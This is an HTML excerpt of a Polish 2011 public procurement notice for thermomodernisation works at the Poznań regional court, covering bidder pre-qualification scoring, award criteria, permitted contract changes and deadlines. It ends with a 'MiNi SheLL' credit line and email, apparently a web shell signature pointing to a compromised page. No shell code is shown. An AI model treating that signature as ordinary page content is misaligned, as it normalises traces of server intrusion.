<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia, w oparciu o informacje (i ich weryfikację) zawarte w załączonych do wniosku dokumentach i oświadczeniach. Z treści tych dokumentów musi jednoznacznie wynikać, że wykonawca spełnia wszystkie warunki. Jeżeli liczba
wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza niż 5, zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki. W przypadku, gdy liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, Zamawiający zastosuje dodatkową
kwalifikację polegająca na przyznaniu wykonawcom po 1 pkt za każde dodatkowo wykonane ponad minimum kwalifikacyjne zamówienie polegające na wykonaniu robót wymienionych powyżej w dziale III.3.2): 1) wykonał
usługę polegającą na przygotowaniu, opracowaniu i złożeniu wniosku aplikacyjnego do Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS), zakończoną uzyskaniem finansowania całości robót
budowlanych termomodernizacyjnych objętych wnioskiem (1 punkt za każde zamówienie ponad liczbę
stanowiącą minimum dopuszczenia do udziału w postępowaniu); 2) wykonał zamówienie obejmujące roboty
termomodernizacyjne polegające na dociepleniu ścian zewnętrznych budynku lub budynków, o powierzchni
docieplenia każdorazowo w ramach jednego zamówienia co najmniej 10.000 m.kw. (1 punkt za każde
zamówienie ponad liczbę stanowiącą minimum dopuszczenia do udziału w postępowaniu); i zaprosi do składania
ofert wykonawców, którzy otrzymają największą ilość punktów podczas dodatkowej kwalifikacji. W przypadku,
gdy ta kwalifikacja nie wystarczy do wybrania 5 wykonawców, ponieważ większa ich liczba otrzyma tę sama
ilość punktów, zostanie przeprowadzona pomiędzy tymi wykonawcami kolejna kwalifikacja w oparciu o przychód
netto ze sprzedaży w 2009 roku. Dodatkowe punkty zostaną przyznane wykonawcom według wzoru: przychód
netto we wniosku badanym/przychód netto we wniosku o największej sprzedaży x 100 pkt.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co 
najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.


2. Zmiana sposobu spełnienia świadczenia:
1) Zmiany technologii: zmiana zastosowanej technologii wykonania zamówienia na technologicznie korzystniejszą dla Zamawiającego (np. nowocześniejszą, mniej energochłonną), po zaakceptowaniu jej przez inspektorów nadzoru inwestorskiego i osoby pełniące nadzór autorski oraz osoby upoważnione przez Zamawiającego pod warunkiem, iż cena oferty nie wzrośnie (zmiana technologiczna może być powiązana z obniżeniem wynagrodzenia na zasadach określonych przez Strony). 
2) Zmiany osobowe: zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego.

3. Pozostałe zmiany:
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b) zmiana obowiązującej stawki VAT;
c) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
d) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami; 
e) kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych 
powodujących uniknięcie kolizji, a wynagrodzenie zostanie ustalone z zachowaniem zasady 
opisanej w lit d);
f) zmiany uzasadnione okolicznościami o których mowa w art. 357.1 K.c z uwzględnieniem 
faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 K.s.h. 
g) zmiana związana z wykonaniem robót zamiennych, zgodnie z procedurami i wymogami zawartymi w przepisie art. 36a ustawy Prawo budowlane z zastrzeżeniem, iż zmiany nieistotne w rozumieniu tego artykuły nie wymagają aneksu do umowy (akceptacja zmian nieistotnych może nastąpić po uprzednim podpisaniu protokołu przez przedstawicieli Zamawiającego, wykonawcy, inspektora nadzoru w branży, której zmiany dotyczą oraz właściwych projektantów);
h) zmiana terminu zakończenia lub terminów pośrednich lub innych warunków realizacji zamówienia, z uwagi na warunki określone w umowie pomiędzy Zamawiającym a Narodowym Funduszem Ochrony Środowiska i Gospodarki Wodnej, obiektywnie uzasadnione potrzeby Zamawiającego.

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 

Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy p.z.p.:
1) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego); 
2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami;
3) udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych; 
4) udzielenie zamówień uzupełniających w zakresie wskazanym w specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja dla wykonawców zaproszonych do składania ofert będzie dostępna pod adresem: Sąd Okręgowy w Poznaniu, ul. Piaskowa 4-5 pokój nr 3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2011 godzina 10:00, miejsce: Sąd Okręgowy w Poznaniu, Al. Marcinkowskiego 32, pokój nr 415 sekretariat Dyrektora Sądu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com